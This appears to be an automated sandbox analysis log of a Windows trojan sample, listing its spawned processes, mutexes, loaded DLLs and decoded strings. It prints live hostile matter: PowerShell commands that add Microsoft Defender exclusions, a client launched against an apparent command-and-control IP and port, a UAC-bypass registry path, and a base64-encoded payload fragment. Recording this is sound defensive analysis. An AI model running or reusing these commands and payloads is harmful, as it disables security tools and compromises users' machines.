                  Source: licarisan_api.exe, 00000000.00000002.1517624626.000000000250E000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStub.exe" vs licarisan_api.exe
                  Source: licarisan_api.exeBinary or memory string: OriginalFilenameScreenShot.exe, vs licarisan_api.exe
                  Source: licarisan_api.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, ZMYTFC94A7P9.csBase64 encoded string: 'YUhSMGNITTZMeTl5WVhjdVoybDBhSFZpZFhObGNtTnZiblJsYm5RdVkyOXRMMGR2WkU5bVYyRnlaVVpoY21VdlZHaGxSMjl2WkV0cFpGQm9iM1J2Y3k5dFlXbHVMM0owTG1wd1p3PT0='
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, YGRKZZ70EYH6.csBase64 encoded string: 'VFZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQUFoWStxa0FBQUFBQUFBQUFPQUFJZ0FMQVRBQUFPQUJBQUFJQUFBQUFBQUFkdmtCQUFBZ0FBQUFBQUlBQUFCQUFBQWdBQUFBQWdBQUJBQUFBQUFBQUFBR0FBQUFBQUFBQUFCQUFnQUFBZ0FBQUFBQUFBTUFZSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFDTDVBUUJQQUFBQUFBQUNBSFFGQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUNBQ0FBd0FBQUNBK0FFQU9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUFITjRCQUFBZ0FBQUE0QUVBQUFJQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQUhRRkFBQUFBQUlBQUFZQUFBRGlBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQUNBQ0FBQUNBQUFBNkFFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUJXK1FFQUFBQUFBRWdBQUFBQ0FBVUF4TEVBQUV3cEFRQURBQUlBQVFBQUJoRGJBUUJ3SFFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQnN3QlFDSkFRQUFBUUFBRVhNYUFBQUtKWElCQUFCd2J4c0FBQW9sY2drQUFIQW9IQUFBQ204ZEFBQUtieDRBQUFweTlnQUFjQ2dmQUFBS2J5QUFBQW9sRjI4aEFBQUtKUmR2SWdBQUNpVVhieU1BQUFvbEZtOGtBQUFLS0NVQUFBb21jeG9BQUFvbGNnRUFBSEJ2R3dBQUNpVnlCZ0VBY0c4Z0FBQUtKUmR2SVFBQUNpVVhieUlBQUFvbEYyOGpBQUFLSlJadkpBQUFDaWdsQUFBS0poWUNHWnB6SmdBQUNnb0dGaFp2SndBQUNpMElCbThvQUFBS0ZBcmVJU1lXY2hVQ0FIQnpKZ0FBQ2dzSEZoWnZKd0FBQ2kwSUIyOG9BQUFLRkF2ZUFBQW9tZ0FBQmlncEFBQUtnQzBBQUFSK05nQUFCQnB2R2dFQUJvQXNBQUFFZml3QUFBUWJMd2NmRklBc0FBQUVBaGFhS0NvQUFBcUFJZ0FBQkFJWG1vQWdBQUFFQWhpYUtDc0FBQXFBSVFBQUJDZ3NBQUFLY2kwQ0FIQW9MUUFBQ2lnZkFBQUtnQ1FBQUFRb0xnQUFDbTh2QUFBS0RCSUNLREFBQUFxQUpRQUFCQ2d1QUFBS2J5OEFBQW9NRWdJb01RQUFDb0FtQUFBRWZpQUFBQVIrSVFBQUJDZ0NBQUFHSUJBbkFBQW9NZ0FBQ2l2MEp0NEFLZ0FBQUFFY0FBQUFBSk1BSHJFQUlSTUFBQUVBQU5NQXNvVUJBeE1BQUFFYk1BWUF0UUVBQUFJQUFCRnpNd0FBQ29BZUFBQUVJT2dEQUFBb01nQUFDbjRlQUFBRUFnTnZOQUFBQ3Q0REp0N2JmaDRBQUFSdk5RQUFDb0FmQUFBRWZoOEFBQVFYalZjQUFBRVdGaFQrQmdNQUFBWnpOZ0FBQ2hSdk53QUFDaVorT0FBQUNuSXhBZ0J3YnprQUFBcHlpd0lBY0c4NkFBQUtkRkVBQUFFS0tEc0FBQW9MY3FNQ0FIQW9QQUFBQ25LekFnQndLRDBBQUFvb1BnQUFDaTBzY3FNQ0FIQW9QQUFBQ25LekFnQndLRDBBQUFvb1B3QUFDaE1FRWdSeXh3SUFjQ2hBQUFBS0tFRUFBQXB5b3dJQWNDZzhBQUFLY3JNQ0FIQW9QUUFBQ2loQ0FBQUtESE5EQUFBS2N0MENBSEFvUkFBQUNuSUZBd0J3Y2c4REFIQnZSUUFBQ25JUkF3QndjZzhEQUhCdlJRQUFDbTlHQUFBS0tFY0FBQW9OZmg0QUFBUnZTQUFBQ205SkFBQUtiMG9BQUFvWGpWOEFBQUVsRmg4Nm5XOUxBQUFLSm40ZkFBQUVId3lOVVFBQUFTVVdjaGNEQUhDaUpSZCtJZ0FBQktJbEdISWxBd0J3b2lVWmZpUUFBQVNpSlJweUx3TUFjS0lsR3dkdlRBQUFDbTlLQUFBS29pVWNjaThEQUhDaUpSMEdvaVVlY2k4REFIQ2lKUjhKQ0tJbEh3cHlNd01BY0tJbEh3c0piMG9BQUFxaUtFMEFBQW9vaGdBQUJ0NERKdDRBS2dBQUFFRTBBQUFBQUFBQUZBQUFBQTRBQUFBaUFBQUFBd0FBQUJNQUFBRUFBQUFBVkFBQUFGMEJBQUN4QVFBQUF3QUFBQk1BQUFFYk1BWUFnd0VBQUFNQUFCRitIZ0FBQkFvV0N3WVNBU2hPQUFBS2MwOEFBQW9NQ0JadlVBQUFDZ2dYYjFFQUFBb0lHVzlTQUFBS0hvMVhBQUFCRFI0VEJCWVRCU3N0Zmg4QUFBUUpFUVVSQkc5VEFBQUtKUzBMSUVZbkFBQnpWQUFBQ25vVENoRUVFUXJhRXdRUkJSRUsxaE1GRVFRV01NNEpGaWhWQUFBS0V3WVdFd2NSQm5OV0FBQUtmbGNBQUFvb1dBQUFDaWhaQUFBS0Y
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, 2ZVQL0G981AF.csBase64 encoded string: 'VTI5bWRIZGhjbVZjVFdsamNtOXpiMlowWEZkcGJtUnZkM01nVGxSY1EzVnljbVZ1ZEZabGNuTnBiMjVjVjJsdWJHOW5iMjVj', 'VTI5bWRIZGhjbVZjVFdsamNtOXpiMlowWEZkcGJtUnZkM01nVGxSY1EzVnljbVZ1ZEZabGNuTnBiMjVjVjJsdWJHOW5iMjQ9', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVsbFxvcGVuXGNvbW1hbmQ=', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVsbFxvcGVuXGNvbW1hbmQ=', 'QzpcV2luZG93c1xTeXN0ZW0zMlxDb21wdXRlckRlZmF1bHRzLmV4ZQ==', 'VTI5bWRIZGhjbVZjVFdsamNtOXpiMlowWEZkcGJtUnZkM01nVGxSY1EzVnljbVZ1ZEZabGNuTnBiMjVjVjJsdWJHOW5iMjVj'
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, 432UNQ7P4ZIK.csBase64 encoded string: 'U2VsZWN0ICogRnJvbSBXaW4zMl9Qcm9jZXNzIFdoZXJlIFBhcmVudFByb2Nlc3NJRD0=', 'U2VsZWN0ICogRnJvbSBXaW4zMl9Qcm9jZXNzIFdoZXJlIFBhcmVudFByb2Nlc3NJRD0='
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, GLBIU47KBU1H.csBase64 encoded string: 'IC90YXJnZXQ6d2luZXhlIC9wbGF0Zm9ybTphbnljcHUgL29wdGltaXplKw=='
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@21/12@5/2
                  Source: C:\Users\user\Desktop\licarisan_api.exeFile created: C:\Users\user\Music\OcoulsUpdaterJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMutant created: \Sessions\1\BaseNamedObjects\vUiuCXqqM
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2104e5b.dcw.ps1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\explorer.exe
                  Source: unknownProcess created: C:\Windows\explorer.exe
                  Source: unknownProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\licarisan_api.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: licarisan_api.exeReversingLabs: Detection: 21%
                  Source: licarisan_api.exeVirustotal: Detection: 33%
                  Source: C:\Users\user\Desktop\licarisan_api.exeFile read: C:\Users\user\Desktop\licarisan_api.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\licarisan_api.exe "C:\Users\user\Desktop\licarisan_api.exe"
                  Source: C:\Users\user\Desktop\licarisan_api.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM
                  Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /NoUACCheck
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /NoUACCheck
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\licarisan_api.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqMJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exitJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exeJump to behavior
                  Source: C:\Users\user\Desktop\licarisan_api.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\licarisan_api.exeSection loaded: k7rn7l32.dllJump to behavior
                  Source: C:\Users\user\Desktop\licarisan_api.exeSection loaded: ntd3ll.dllJump to behavior
                  Source: C:\Users\user\Desktop\licarisan_api.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\licarisan_api.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
